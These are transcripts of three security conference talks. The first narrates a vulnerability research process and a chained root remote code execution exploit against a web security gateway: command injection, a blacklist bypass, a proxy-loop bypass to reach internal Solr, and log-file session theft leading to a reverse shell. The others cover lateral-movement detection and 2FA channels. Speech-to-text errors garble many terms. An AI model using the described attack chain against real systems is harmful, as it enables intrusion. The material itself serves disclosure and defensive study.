So I strongly suggest you to be a friend with IntelliJ or Eclipse if you are up to a wonderful research on Java application guys. So I beg your pardon. So we have access to the source code of the administrator interface. So we are ready to do for the last step, which was finding a vulnerability. There is a difference approach to do it, like top to bottom or bottom to top. But the top means you know the potentially vulnerable functions on the Java, let's say, you can directly search those functions within the code base. And if you believe that you just find a very interesting, very insecure way to use those potential vulnerable function, you can start from the bottom to go to the top in order to find out whether you are control to parameter that passed through all the function calls. Or you can start from top to bottom, which is like, you know, start by reading the filter or the middleware definitions and the classes, look for the authentication mechanism, and then search for all the controller or the request handler definition, which will be an important because that is the location where you can see the user controller parameters, etc. In that case, I was the top to bottom approach. I choose that approach for because of not very specific reason, I was like, you know, doing fun funny time on the Sunday, and I was just start reading the source code, and it was like a top to bottom approach. I wish I could show you all the code bases and everything, but I believe I don't have enough time to do it. So I just grabbed a very specific function definition, which name is a month device. It has to be a post request to be able to execute the function definition. And there is a very interesting if statement in here, it tells you if the request is coming from the local host, it is okay. If the request is not coming from the local host, I'm going to validate your session and your privilege as well. Since we don't have the username, the password, you know, this is going to be a problem for us because it is a password protections. If the request is not coming from the local host, and there is a one function call in here, get token, which will be have a very important role on our exfoliation. We will come back in later. So that was the important part of the function, and we are moving to do more important stuff. So it tells us that the request must be a post request and the post body, it is taken from the request and it is a GSM object. And we're going to get the month device string from the GSM data. And that part is quite interesting because it performs some sort of escaping. So if the month device contains a double code, it will be escaped. If it contains a back tick dollar sign, it will be escaped by the backslash. But the problem is, if it contains backslash, it will escape backslash one more time. So if we have the double code, it will be escaped one time, and it will be escaping backslash one more time in here. There isn't some sort of problem in here. And after that, there is a function call, which is a Isvalut month device, and it takes our parameter that we can control. And if we manage to pass that if statement, we are going to see XUiHalper CMD, which is sent to execute operating system command with a parameter that we are controlled. So we need to skip that if statement. It has to be returned to. So let's have a look at that one. Isvalut month device, it is just like a very weak blacklisting. It tells you it cannot be contained, bash, bnfs, pythons, slash, Perl, Python, et cetera, et cetera. 
It validates, it performs some sort of blacklisting on that one. But the problem is, it has the white space at the beginning of the Perl and the Python command in here. So it's a very weak blacklisting. We can bypass that without having any problem. So we have to keep that in our mind if we've managed to find a vulnerability. So all right, we can pass that part and we can reach in here. So it is time to read the XUiHalper CMD. And XUiHalper CMD, it is going to execute UI helper binary with a sub-CMD, which is a command that we can control. So what is UI helper? It is located in here and it has a root privilege and there is a suid bit. So all the commands will be executed with a root user. So if you find a way to execute our command, that command will be executed with the root privileges, which is something very, very important for us. And finally, that function calls XS-CMD, which is basically calls runtime.getRuntime.exec. So obviously we have command injection vulnerability in here. So we believe that we have the vulnerability in here and we need to do the proof of concept. Thanks to do reading a funny manual and the product feature steps of the methodology, we know where is which administrator interface, I mean, which many of them it is going to execute that specific endpoint. Of course, you can build it from scratch, but this is more easier for me. As you can see, that is the post request and there is a month device and we can inject our command in here because the dollar sign, it will be used for the execution and the dollar sign escaped one time and the backslash escaped one more time, which means there is no escaping at all. That backslash escaping did another one and there is nothing related with the dollar sign, which will helping us to inject our command. So basically we are executing sleep command with a 15 seconds with administrator, with a root privilege. So let's talk about the exploitation of that vulnerability as well. I am one of the Metasplit contributors and I usually using the Python dropper for the exploitation when I face the exploiting the Linux machines, but there is a problem about the Python dropper from the MSF venom of the Metasplit. It has to be included double code that wraps up our dropper command in order to pass it to the Python process. So that means we are not going to be able to directly use it because as you know, the double code has been escaped on the back-end service. So the idea is that we can use Perl because Perl can take a parameter with a single code which is allowed to use and basically the idea is simple. I want to execute Python dropper but I am going to put that Python command into the Perl command. So basically during the exploitation we are going to execute Perl which is going to execute first step of the Python dropper. When the Python execute it communicates with the handler and the handler sends the second stage. So there is a lot of execution one and after and there is a Ruby code as you can see in here that we can build a Perl command which includes which contains our Python command. So it's a quite nice trick. So I reported that vulnerabilities to the ZDI and of course ZDI told me that the authentication is required to exploit the vulnerability but we are going to see that the exploitation can be bypassed, guys. So we have to bypass authentication. Those are the initial ideas. 
We can find a stored cross-site script in vulnerability because we can force authenticated user to send HTTP request to the month device endpoint where we have the command injection and since the user is going to be manipulated by JavaScript that request will be sent to the endpoint with the authenticated user. So we don't have to be thinking about authentication request, authentication stuff. Another idea is it would be handy to find something as a Sarah fish vulnerability, some sort of some type of a Sarah vulnerability quite could be handy in order to communicate with internal services so that we can send a request from the localhost to the endpoint or you can go directly after the authentication bypass. I don't have too much time. I'm just going to show you how I find a stored cross-site scripting on the administrative interface. So as you can see in here, that is a very basic HTTP request to the proxy service. It tells to the proxy service that I want to send a get request to the pentest up below and proxy service does the job and sends the response back to the user. So that activities is being written into the administrative interface. Guys remember the Python and the Apache solar stuff that we have talked about 15 minutes ago. That activities has been written to the Apache solar database which is presented into the administrative interface. So the idea is that we can control that data in here because we can tell anything we want to the proxy service. So the idea is quite simple. As an attacker, we are going to intentionally dole on a very, very known malware through the proxy service. So proxy product can detect it and produce a log file and it will be like ringing all the alarms. I call the malware, etc. But the data will be written into the Apache solar which is being used in the administrative interface and very, very specifically in here. So when the system administrator logs in and checks what's happening, we can execute JavaScript code on the system administrator browser. And thanks to that JavaScript code, we can send an IX request to the vulnerable endpoint that we have found in the first place. So you know, there was a quite interesting XSS vulnerability because whenever the browser sending requests to the proxy, they are performing the full URL encoding in here. But I'm manually crafting the request to the proxy service. That means there will be a no encoding and that data is not being encoded on the administrator interface. Basically, we have a cross-site scripting spatial, the store cross-site scripting vulnerability in here. So instead of popping up other bugs, we can just call IX request to the endpoint that we have the command injection. So that was, I reported that vulnerability to the ZDI as well. As you can see in the vulnerability description, attacker can leverage this in a conjunction with other vulnerabilities to execute code in the context of the root user. But guys, cross-site scripting is a cool. I'm not underestimating any kind of vulnerabilities, but it is just not enough for me because there is a huge setback which requires the user interaction for the exploitation. I was like, okay, I just find something very cool, you know, intentional don't link malware, etc., etc. That is what's simple and cool. But I need to find a better way to continue the exploitation. But you know, I got another idea while I was spending a time to find an excess through the proxy service. So the idea is targeting proxy service itself. 
So as you can remember from the previous slides, that is the HTTP request, the very simple HTTP request to the proxy service itself. It tells the proxy service that I want to communicate with the Pantheon stock block. Proxy service, get the response and send it back to the user. So what happens if I tell the proxy service that I want you to communicate with yourself? In that case, it told me there is a self-referential request to proxy or forbidden. And I was like, all right, that means there is some sort of control and lots of if statements in the proxy service itself. What happens if I manage to trick the proxy service to communicate with an internal service? That was the main idea. So that is the function, get end user other notification function. I set a break point in here, which produced exactly same error message that we have seen in here. And I just sent the same request and it hit the break point and it tells you that get user notification or the notification has been called by the prepare proxy loop rejection, which has been called by the handle proxy loop, which has been called by the due processing. So we're going to read all of those functions. So within the due processing, there is a function call, which is a e-reverse proxy and the function is a member of the proxy config cache. So basically product try to understand like am I being placed as a reverse proxy? And in that case, handle proxy loop has been called. This function that we have seen on the previous slide. And that function calls TM socket address is same ADDR. That is the important part because that function performs full URL comparison with a URL of the proxy service with URL of the user try to communicate. So if it is a same address, it calls prepare proxy loop rejection call and we are seeing that error message. So I just changed the port number to the purchase order service. And due to that changes, there will be a no match in the full URL comparison on the proxy service and there is administrator interface of the Apache solar service. I'm just can communicate with it because of a very interesting bug in the process service. So as you can see in here, I'm allowed to communicate with the Apache solar service administrator interface. So all right, that was another very, very, very important vulnerability because we can we are going to leverage this vulnerability to the bypass authentication on the systems and in the end, we're going to chain all of them together guys. So Apache solar service in the box, I mean, in the product was very old version because it's not quite easy to upgrade your third party dependencies like Apache solar or database servers. And in these type of solutions, it's quite hard to upgrade to newer versions. So there was a very, very old vulnerability in Apache solar service, but it is exactly what I need. It is arbitrary file read vulnerability. So there is that is the name of the collection. And there is a replication endpoint, and the command has to be a file content, and you can try was back to the roots folder, and then you can call whatever you want. And that will gives you to reading any content of the file. So at the beginning, I wasn't there was no way to communicate with the Apache solar service, but we find a very interesting bug. And by exploiting that bug, we are going to read anything we want. So far, so good. I want you to remind a get talking function, you know, it was like a way behind of our presentation. Guys. All right. Do you remember that get talking function? 
It is going to help us what we are going to actually in here because let me yeah, because that function takes cookies from the HTTP request and it returns the value. But the problem is it's printed out the value and the name of two cookies. But the job application is running by the Tomcat process. So those standard outputs data will be written into the log file, which is a Catalina dot art file. So due to that little function, all of those valid session IDs written into the log file and we have arbitraried file read vulnerability. So what we are going to do that, we're going to exploit two vulnerability together in order to get the content of the Catalina dot art file, which contains a valid session IDs. And then we are going to collect all the session IDs together. And we can go to administrator interface in order to exploit comment injection vulnerability with active session IDs. So the idea is actually quite simple guys. We are going to in the first step, we are going to exploit a comparison bug in the proxy service, which help us to communicate with the Apache solar service that is running within the product itself. And this is a very old software which has a vulnerability and it is arbitraried file read and combination of that vulnerability. We are going to read Catalina dot art file. And we're going to by using regx, we're going to extract all the session IDs that we have. And there is a check session endpoint. I haven't talked about it because it was quite easy. There is a check session endpoint in the product. We are going to test all the session IDs we have in order to find out whether it is still active or not. And if you find the active session, we are going to exploit the comment injection vulnerability. And we are going to be executing operating system command with a root privilege, which will give us a C2 reverse shell to our command and control server. That is the idea. And of course, I have implemented a method split module that performs all of those steps automatically. And I have a video for it. I would like to, I guess, yeah, yeah, time is good. I guess I still have a minute. So let's see. And by the way, that method split module has been merged to the master branch of the method split project. So it just can go and fetch the module and install the product on your lab and have fun. So when we run, as you can see in here, it's tried to, it's exploits reverse process service and extract the Kotlin.out file. And of course, this is a demonstration. There is only one session ID in the log file and it's in the active. And by using the session IDs, it goes to the comment injection vulnerability and it's execute operating system command, which is a pro command. Pro command contains a Python command, you know, and all of those steps has been automatically done. And as you can see in here, we have a root session on the back filter solution of the company, guys. That's it. Thank you very much. Thanks everybody.
|
Most security products require to be placed in the heart of the organization's IT configuration. Even though we are highly paranoid and security aware about every single third party tool that we include in our IT structure; we lose these concerns when it comes to security products. We forget to see that even though these are security products in their nature; they are not necessarily secure in terms of their operation; despite the fact that they require much more permission than any other software. In this talk, I will take you through the steps of vulnerability research, which attack vectors were more promising than the others, which critical vulnerabilities were easier to find, how was the exploiting phase and much more. To do that, I will be using one of my 0day remote code execution exploit that targets Trend Micro Web Security product, which uses a combination of 3 different vulnerabilities to gain RCE as a case-study.
|
10.5446/51618 (DOI)
|
Hey, AppSeg village. Welcome back and get ready for another talk. Coming up next, we've got Can't Touch This, detecting lateral movement in zero-touch environments. Philip Marlowe is going to be presenting this. Philip is a cybersecurity and DevOps engineer. He helps organizations understand how to adopt DevOps practices to increase their security rather than sacrifice it in the name of speed. Philip holds several security, cloud, and agile certifications, and is currently pursuing a master's degree in information security engineering at SANS Technology Institute. Please give it up for Philip Marlowe. Hello, everyone, and welcome to Can't Touch This, detecting lateral movement in zero-touch environments. In this talk, we're going to talk some about DevOps and how to detect attackers trying to move into your production environments. Before we get started, a few disclaimers and acknowledgments. First off, I work for the MITRE Corporation, but nothing I'm saying today reflects their opinion. Also, I'm a student at the SANS Technology Institute working on my master's degree. Huge shout out to my faculty research advisor, but I'm not speaking for her or SANS today either. And lastly, big thank you to my wife, Madeline, once again, not speaking for her in this presentation today. So who am I? I'm Philip, and professionally, I really enjoy the intersection of security and DevOps. Yes, you can call it DevSecOps if you want. I don't really care either way. I wrote my first vulnerable code in elementary school. I was writing a blogging platform for my family and right in there because I didn't know any better, put a SQL injection vulnerability. I was a big surprise for them when they found out we've been hacked because of that. I first began learning to exploit applications in middle school when I received as a president the book, Hacking the Art of Exploitation. And I've been involved in application security one way or another ever since then. Today's my first time as a DEF CON speaker, and I'm super excited to be here. And one of the things I really enjoy is being able to learn through hacking. And you'll see a flavor of that throughout this presentation as we take both the attacker and the defender point of view. So if you're not already on board, why should I care about DevOps? Well, for one, you probably don't have any choice. If you're running any kind of application, that's the way it is now. You probably just need to learn about it. You know, if you're red team standing up command and control infrastructure, helps to have DevOps. Your blue team trying to implement monitoring and detection helps to have DevOps application security. DevOps is the way of life now. And, you know, provides all these security benefits on top of reliability benefits and maintainability benefits for the other parts of the business. So let's take a look at a very simplified environment. And let's take a look at it from the attacker's point of view. We want to get to something on the application server. Maybe we want to steal data off of it, or maybe we just want to use the hefty server power for crypto mining. Either way, we've got three basic options. Option one is to just go straight in the front door and attack the application itself in order to get access to the server. This is pretty simple. You may be there's a firewall or IDS you have to evade, but, you know, you're not making a lot of hops around to finally get to where you want to be. But it's also not 2002 anymore. 
The situation has gotten a lot better in how we protect our application servers. So while this once might have been the best way in, it's not really anymore. Report after report from places like FireEye and Verizon have shown a much more popular way into networks these days is by social engineering users in one way or another. In this case, we're going to take a look at phishing a operator or developer on their employee workstation to give us our initial access. Then in method two, we're going to move laterally through the Bastion host and finally to the app server. We'll talk in a couple of slides about why this works so well. But before we get there, let's talk a little bit about option three. With DevOps implemented these days, another way into that protected app server is through the DevOps pipeline itself. But there are a lot more hops here and a lot more ways that can go wrong and a lot more opportunities to detect this attempt. It goes through source control repos, test servers, and configuration servers before we ever get to our intended target. So how does traditional application deployment work? Well, developer give ops a deployment package and if we're lucky, some install instructions and then ops is going to go and log into the application server manually install that software. Pretty simple. And then an update comes along and you have to go and manually log in and update. And then the security patch comes along and you have to go log in and update. And this manual logging in and updating is going to be a real problem for detecting lateral movement. So what does traditional lateral movement look like? Because they're logging in to do configuration and updates all the time, ops has highly privileged credentials. This might take the form of SSH keys or API tokens. And oftentimes they're stored in plain text on their employee workstations. If you've already fished that user, those are really easy and really juicy targets to steal those credentials and move further into the environment. All right, so that sounds like it's a problem. What is this zero touch concept? Google defined zero touch networking and zero touch production. And they've given several presentations on what that means to them and how they've implemented it in their environment. Overall, it's about how we can abstract away managing the production environment. So that we're not doing those manual logins, change things, configure and update anymore. And while Google is one of the only companies to use the zero touch nomenclature, a lot of companies do this. Often it's just a result of being very mature in their DevOps practices that everything is handled by automation rather than human users. So zero touch deployment looks very different. Every change is made by automation and pre validated. This means no humans logging in. And that's key for our talk today. You'll also notice on Google's presentation, there's a lot of information about the zero touch deployment. So what does this zero touch deployment look like in practice? Well, rather than having a user log into the app server via a bastion host, since it's a very simple application, it's a very simple application. So we're going to use the zero touch deployment as a tool to help us understand what's going on in the rather than having a user log into the app server via bastion host. Since that's no longer allowed, every change has to go through that DevOps deployment pipeline. 
Looking at how attackers are going to move laterally, however, let's compare and contrast between the traditional and the zero touch deployments. So I'm about to play an animation and keep an eye out for the malicious connection between the bastion host and the app server. It's going to be a slightly different color to arrow. Did you catch it? Have you seen it yet? It's kind of tricky to find. And this is this when it stands out in some way. If we're looking at encrypted connections like SSH or HTTPS, it may not stand out in any way unless you're doing some kind of break and inspect in the middle. Now let's compare it to zero touch. In the zero touch deployment, you're going to see a bunch of arrows again showing normal benign traffic. And you'll also see one arrow that'll look a little different being our attacker trying to move laterally. See if it's easier to spot this time. I'll bet that was a lot easier. And as soon as it came up, you noticed it. This is the whole concept that we want to use writing this detection. So how do we actually go about detecting this lateral movement? There's a few things we need to do. First, we need to define all of the protected servers. In our simplified environment, that's just the app server. But it might also include DevOps automation servers. It might include web servers, database servers, all of which might be behind load balancers. Whatever humans should not be logging into, that goes in this list. We also need to define all of the human access points into the environment. Again, in our simplified environment, that's just the bastion host. But depending on your network architecture, you might need to include other sets of load balance machines, virtual desktops, employee workstations, anything of that nature. That goes in the second list. And then all we do to detect is look for any connections between those two sets of servers. Then alert, investigate, enjoy detecting this lateral movement. Let's take a quick look at what this looks like in practice. So for the demo, we're going to look at a couple of scenarios. First up, let me tell you what you're seeing. In this environment, I've got a bastion host that's used for manually accessing it when needed, an application server, and a configuration server running puppet. So just to make sure that there's nothing up my sleeves, what we're going to do for this demo is run some puppet configuration in the background. This will be traffic both within the environment to the puppet server and external to the environment, SSH connections and HTTPS connections out to the wider internet. So let's get that started. And then while this runs, jump over to the bastion host. And as you can see, we've already compromised the bastion host. And we see some SSH credentials that we found, and in fact, some SSH credentials for the application server that has the goodies we want to get to. So we'll run our evil script file. And in real life, this might be installing a crypto minor or any number of things. In this case, just modifying the configuration files that puppet is managing to show that we've actually gotten in and had the ability to do evil if we want it to. So now we're going to jump over to the network monitor. This is a plain instance of security onion with all of the usual defaults and alerts installed. And what we're looking at right now are the Zik notices. And may turn on the refresh, but you'll see a whole lot of nothing. Zero, no results found no results found. If we switch over to squirt and refresh it. 
Same thing. No result. No result. And this is exactly what we expect from a default instance of a network monitor. It's not going to alert on connections like this. Let me enable the rules we've been talking about. And then we'll come back and we'll try this again. And now that I've enabled the zero touch rules, let's try it again and see what's changed. As you can see, the lab server is still emulating real traffic by reaching out to the puppet configuration server and to the external internet. Let's go over to the bastion and run our evil script again. Same thing utilizing those compromised SSH credentials to reach in and modify the app server. Now we'll jump over to the network monitor. And as you can see, we're starting to get alerts. Zik has noticed a couple of connections from the bastion host to the app server. And if we switch over, you'll see the same thing in squirt as well. Notice how they work slightly differently. The squirt gives us many more alerts because it's looking individually at the packets traversing the network versus Zik gives us total number of connections. But either way, we're seeing the alerts that we're violating this zero touch policy and that it's a good indicator of lateral movement. So you want to start doing this in your environment as well. Well, first off, if you're not zero touch yet, you should move that direction. Implement zero touch. It's got a lot of benefits besides this one. When you're ready to implement this detection, use your platform of choice. Whatever you're already using is going to be best. There's no need to go get specialized software or hardware in order to do this. Use your existing IDS or network monitor. It's a very simple detection to include. But then you need to look at the data and the information to how you tailor it for your specific environment. In the example, it was looking for all TCP connections because I wanted to catch the broadest range of lateral movement. But that might not make sense for your environment. So maybe you need to tailor it down to only look for SSH connections or, you know, whatever makes sense for your environment. And then the detections I showed were all very simple. It just looked for that connection and alerted. But that can be just the beginning of a bigger process. Imagine with ZEKE instead of raising a notice if we correlated that with other suspicious traffic that we'd seen, maybe some data exfiltration traffic, and then we could automatically provide analysts with here's the map of the attackers path through the network. Starting to add some of those higher end capabilities really makes this powerful. And finally, I wanted to leave you with some lessons learned from this project. And there are two that really jumped out at me. The first is know your network. And this is not just know your networking. It is know your specific network. Justin Henderson and Mick Douglas who teach the tactical seam class for SANS really nailed this. And I learned this from them. So a huge shout out to them. Knowing the specifics of your network lets you do really cool things in monitoring it. Things that aren't possible in generic networks, such as the detection we talked about today. And then secondly, don't be afraid to look for stupid simple things. All we were looking at today was the presence of a connection. 
Tying together these two lessons learned is really this whole project is looking for something simple like the presence of a connection and knowing your network well enough to be able to say that's unusual. That's a problem. Thank you so much for attending the presentation today. Shout out again to the SANS team for their help and support with the research project. If you've got any questions about this project, AppSec, DevOps, the SANS masters program or anything related, the best way to get in contact with me is via Twitter. My handle's on the screen now. If you're viewing the live presentation, I look forward to chatting with you during the Q&A immediately afterwards in Discord. Again, I'm Philip Marlowe. Thanks for coming.
|
Zero-touch environments are a product of the fast-moving world of DevOps which is being adopted by an increasing number of successful companies. This session will show that by leveraging the constraints of this environment, we can identify malicious network traffic which would otherwise blend into the noise.
|
10.5446/51620 (DOI)
|
Good morning and welcome to the Apssec Village. I hope you were here for our first keynote speaker. Welcome to day one of Apssec Village, part of DEF CON 2020. I really wish we were all together in one big room like we were last year, but that's just not going to happen this year. So in the meantime, thanks for tuning in. Thanks for watching along with us. I want to take the moment to introduce you to our next speaker. Our next presentation is going to be 2FA in 2020 and beyond by Kelly Robinson. Kelly works on the account security team at Twilio. Previously she worked in a variety of API platforms and data engineering roles at startups. Her research focuses on authentication user experience and design trade-offs for different risk profiles and 2FA channels. We all know how important 2FA is today. We all want to protect our accounts and I'm looking forward to this talk. I hope you are too, so please give a warm Apssec Village welcome to Kelly Robinson. Hey everyone. I am coming to you today from Brooklyn in New York and I hope that you're doing well wherever you may be on this March 152nd. Hopefully your day is going better than the person who has this password. But even though I trust everyone tuning into a DEF CON talk to have better password hygiene than something as simple as 1, 2, 3, 4, 5, 6, the fact is there's still a lot of folks out there with short, guessable passwords or people that are reusing passwords across multiple sites. As much as we'd like to believe that we're better than this, the website haveabeneown.com proves that simple passwords like 1, 2, 3, 4, 5, 6 are still incredibly common. This password has been seen almost 24 million times across data breaches. Attackers can use this to do credential stuffing attacks across the web and it can basically allow them to hack into a lot of accounts and compromise a lot of credentials and ultimately make a lot of money off of unsuspecting individuals. And that's what we're here to discuss today. This reality where we are so owned that passwords are no longer enough, how other factors, second factors in fact, can help us stay more secure and how to evaluate the different options out there. So my name is Kelly Robinson. I have been working at Twilio for about three years. I specifically work on Twilio's account security team working with our products for things like verify, look up, anything that has to do with phone verification, two factor authentication, phone and email intelligence, things like that. And this team has evolved a lot. We acquired Authy about five years ago and that was kind of the genesis of the team. So Authy is our free consumer application that was recently rented to include the Twilio name about five years later. But we also have APIs for adding things like two factor authentication into your applications. And I spend a good chunk of my time educating developers about security, especially when it comes to authentication itself. And so this talk is going to incorporate a lot of the things that I've learned in the last few years working with developers on a variety of challenges and our customers on their authentication challenges as well. And the failure of good authentication often results in what we call account takeover or ATO. And this is why this is such a big problem, right? Like if there wasn't anything of value on the other side of an account, we wouldn't be as concerned about this. But this is a $7 billion problem. So the end industry is really incentivized to find a solution here. 
And from the 2020 Javelin Strategy and Research study that came out a few months ago, one of the things they noted is that account takeover fraud is one of the hardest types of fraud to identify, because there are so many channels, multi-channel account access, and the desire to reduce friction in the consumer experience. We're trying to make it easy for people to log in, but we also want to keep out the people who shouldn't have access to those accounts, and those can sometimes be conflicting goals. So how do we accomplish those goals? To protect our accounts, we have three types of factors that we'll talk about, and using any two of these means that you're using two-factor authentication. The three types of factors are: something that you know, which could be a password; something that you have, which could be a key or a phone; and something that you are, which is biometrics like a fingerprint or Face ID. All the factors we're going to be talking about today are channels that fall into the possession category, and I want to go over the pros and cons of these common channels for two-factor authentication so we can think about why we would or would not enable them. Starting with second-factor authentication using SMS 2FA codes: one of the big reasons that people still like SMS-based 2FA is that onboarding is so easy. About 99% of Americans have a phone capable of receiving text messages, and that makes a big difference, because if you can't get people to turn on or opt into 2FA, then you're not going to get any of the benefits of offering them a second factor. Because of this easy onboarding, and because it's a familiar experience now, this is something a lot of companies still like to offer, since it adds security without much additional friction. Unfortunately, as a lot of people know, SMS-based 2FA is not that secure. One of the main reasons we say this is something called SIM swapping. This is where an attacker could use either social engineering or bribery to get my phone number moved onto a SIM card they control, and then basically take over my phone number. It's not device control; SIM swapping allows you to take control of a phone number, and that can give you access to things being sent to me, like two-factor authentication codes. So SMS one-time passwords are really convenient, but they are an insecure channel. The next thing I wanted to talk about was TOTP, or time-based one-time passwords. This is a way to generate tokens based on an algorithm: the inputs are a secret key and your system time, and those get put through a one-way function that pops out the truncated token. This is what Google Authenticator, Authy, and apps like that use, and it's an open standard. The symmetric key cryptography offers increased security compared to SMS, but if somebody gets access to that shared secret, then the method is easy to compromise. And you might be saying, well, don't leak that secret. But one of the ways that we share that secret is by scanning a QR code, and there are ways that QR code can get leaked.
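As a rough illustration of the construction she describes, here is a minimal Python sketch of a time-based one-time password in the style of RFC 6238/4226: HMAC over a time counter, then dynamic truncation to a short code. It assumes a raw shared secret for simplicity; real authenticator apps typically base32-decode the secret embedded in the QR code, and production code should use a vetted library rather than this sketch.

import hashlib
import hmac
import struct
import time

def totp(secret: bytes, interval: int = 30, digits: int = 6) -> str:
    """Minimal TOTP sketch: HMAC the current time step, then truncate (RFC 6238/4226 style)."""
    counter = int(time.time()) // interval                      # time-based moving factor
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                     # dynamic truncation offset
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

example_secret = b"12345678901234567890"                        # illustrative only, never hard-code a secret
print(totp(example_secret))

Both sides computing the same code from the shared secret and a clock is exactly why leaking that secret, for example through a stored QR code, compromises the factor.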
At a previous job, we used to keep a copy of a QR code for TOTP in the shared 1Password vault that we used for engineering onboarding, because we wanted to enable 2FA but needed multiple people to have access to it. That's one example of how a TOTP secret could get leaked. TOTP also offers some distinct advantages. Like I mentioned, it's an open standard, which is pretty cool, so you can use the app of your choice. And because the inputs are offline inputs, the method is also available offline. Not that anybody's doing a ton of traveling right now, but this is really useful for people when they're on a plane or in a foreign country where they might not have good cell service, or cell service of any kind. Unfortunately, this does require an app download, which is something to keep in mind because it adds friction to getting people to sign up for this method. And I do want to mention the expiration user experience, because in a study on the usability of different factors, researchers found that two thirds of participants using TOTP via Google Authenticator had problems entering the six-digit code before it timed out. That could be a problem depending on the types of users involved: the expiration logic helps keep it secure, but it also can make it harder to use. Overall, this is a pretty good option. We see a lot of security-conscious companies adding TOTP as a 2FA option, and it's a good next step for adding an open-source, open-standard option on top of SMS 2FA if you want additional security. I also wanted to talk about pre-generated codes, which we might know as backup codes. You don't see these used a lot for ongoing login, but I wanted to mention them because a study that I'm going to reference talks about using pre-generated codes. The benefit is that these are really easy to use: they're basically passcodes or passwords that are generated for you, so they're less likely to be reused and more likely to be secure. They're not going to be 123456. But 25% of participants in this study noted that these pre-generated codes didn't really feel secure, because they're just written down on a piece of paper. The other problem is, if you've ever been asked to store backup codes or implemented a system that uses them: how do you store those? A lot of companies don't give you real guidance on that. So I think this is an option for backups, but the ongoing usability might not be super practical. Finally, I want to talk about push authentication, which was really popularized by apps like Duo. Users love this because it's so low friction: you can approve or deny a login request directly from your smartwatch. It uses asymmetric key cryptography, which means there are two keys, and the private key is only ever stored on your device. That keeps you more secure and prevents you from leaking a shared secret like you might with TOTP. And this is the only form of 2FA that adds the option to explicitly deny a login.
But unfortunately, it's so low friction that you could easily approve an authorization request just to get rid of it. If somebody is attempting to attack your accounts in the middle of the night, you might unintentionally approve a request just to make it go away. This is also a proprietary solution, so it requires a special app. You can do this with something like Authy or Duo, and you can also bake it into your own application, but like with TOTP, getting users to download another app is always going to be a challenge. I think the way we'll see this become more common is with companies that have a lot of mobile users baking this into the existing apps that are already on people's phones. You've seen this with something like Google Prompt: if you enable Google Prompt and try to log in on the browser, Google will say, hey, check your phone, open up any Google app on your phone, and it will pop up an "is this you trying to log in" message without requiring the user to download an additional app. That's one way to get around the user experience hurdle of having users opt into a more secure solution. This seems great, and it's really cryptographically secure, but I think the onboarding logic is going to be something we struggle with for the next few years until this becomes more common. And there's always the problem that it might be too convenient. Lastly, we'll talk about WebAuthn. This is the new hotness for good reason. It offers a really high level of security with asymmetric key cryptography, like push authentication, so the private key is only ever stored on the device, but it's also an open standard, like TOTP. The biggest drawbacks with WebAuthn right now are that it's still relatively new and setup can be a little clunky. Some of the new devices are starting to bake this into the actual device itself, so Android phones can now be used as a WebAuthn authenticator for Google products, but this is not widespread yet. Hopefully it will roll out more widely on devices we already have. But for a third-party option like a YubiKey, in a lot of places you still need that additional authenticator, an authenticator that's compatible with the standard. And YubiKeys and Titan keys are not exactly cheap, and you can't reasonably expect that every user of your application will have one. So until something like this becomes standard on every mobile phone, it's going to be harder to implement across the board. As more of the devices we already have, like our phones and laptops, adopt the standard and become compatible authenticators, we will see an uptake in this factor, and I think this is where you can set your sights on where things are going. It is currently more popular with companies, where your IT department can hand you the physical token like a YubiKey right now, so that's another place you might see this. But a lot of these factors we're focusing on as consumer application channels. I do want to back up these qualitative examples with some more quantitative data.
And to do that, I wanted to think more granularly about how we measure the effectiveness of 2FA, separating it into three categories across the life cycle of 2FA. There's the onboarding consideration, which I've mentioned a couple of times already. There's the ongoing user experience of how these different channels work as you use them day to day. And then there's the account recovery side of things: what happens when you lose one of these factors, and is there a path to recovery? The research I'm talking about is from Brigham Young University and was presented at the SOUPS conference last August. The study focused on setting up five factors, the ones we already walked through: SMS, TOTP, pre-generated codes, push authentication, and U2F security keys. A couple of important caveats: the study didn't take into account how to store pre-generated codes, which I think is pretty important for that type of channel, and 25% of participants noted that the pre-generated codes just didn't feel secure. But when it comes to factor setup, pre-generated codes were the winner in the study, though, like I said, code storage wasn't considered for timing, so I don't know exactly what that would look like on an ongoing basis. A different study from 2018 focused just on YubiKeys, and I think it's really interesting because success varied a lot depending on the platform people were setting it up on, even though the authenticator was always the same YubiKey. 83% of people were successful on Google, while only 32% of people were successful on Facebook. And if you've been following U2F and WebAuthn, you know a lot has changed since 2018, but I do think this is a really interesting look at how onboarding user experience impacts user success. You can guide people towards a successful setup here, but you don't want to guide people the way Microsoft did with a Windows logon authorization tool, where more people locked themselves out of their computer than were able to successfully set it up for that platform. Moving on to usability, one measure of usability was the amount of time it took to authenticate, and on that metric U2F and push were the winners, with the fastest median authentication times. Compared to SMS, some Duo research from last year said this can save people 13 to 18 minutes annually across ongoing authentications, if time is the measure of ongoing usability you care about. On the System Usability Scale, or SUS, a standard measurement used by researchers for this type of thing, all of the methods actually had pretty good usability scores, but TOTP came out on top. This ignores just using passwords; it turns out people don't like adding a second factor at all, because it's additional friction. But if you're going to use a second factor, TOTP was what they considered most usable. This actually surprised me, because this was the same study that said two thirds of users had issues with the timeout, but that didn't affect the rating here.
So maybe that's something we don't need to be as concerned about. I do want to point out that there was somewhat of an inverse relationship here, because U2F and push had some of the lower usability scores; the researchers observed that faster authentication does not necessarily mean higher usability. And you might notice that SMS does not come out on top on any of these; people didn't really like it as a factor, and it had one of the lower usability scores. But even though there are a lot of trade-offs in the level of security of these options, it's important to note that SMS-based 2FA is still better than no 2FA at all. This is really easy for me to say, since I work for a company that does this, but there's research to back me up: a 2019 Google study found that an SMS code sent to a recovery phone number helped block 100% of automated bots, 96% of bulk phishing attacks, and 76% of targeted attacks. That's still really good coverage, especially for something that's really easy to set up and that users are more likely to actually turn on. When you look at push authentication, there is increased protection: that gets bulk phishing attack protection up to 99% and has 90% effectiveness against targeted attacks as well. So you have different options for 2FA, but you also need to get your users to enable the extra security, and adoption of 2FA is pretty abysmal, especially for opt-in 2FA, for a few reasons. Last month DHH on Twitter, who works for Basecamp and is behind the new email platform Hey, was asking how the opt-in rate for consumer 2FA looked at different companies. Companies willing to share this data say it's usually somewhere between one and two percent; depending on the type of platform and how you're getting users to turn it on, you're probably going to have a pretty low rate of adoption here. He mentions that Basecamp was at a paltry 1%. One of the observations behind this is that technology like this is available to help mitigate the risk and 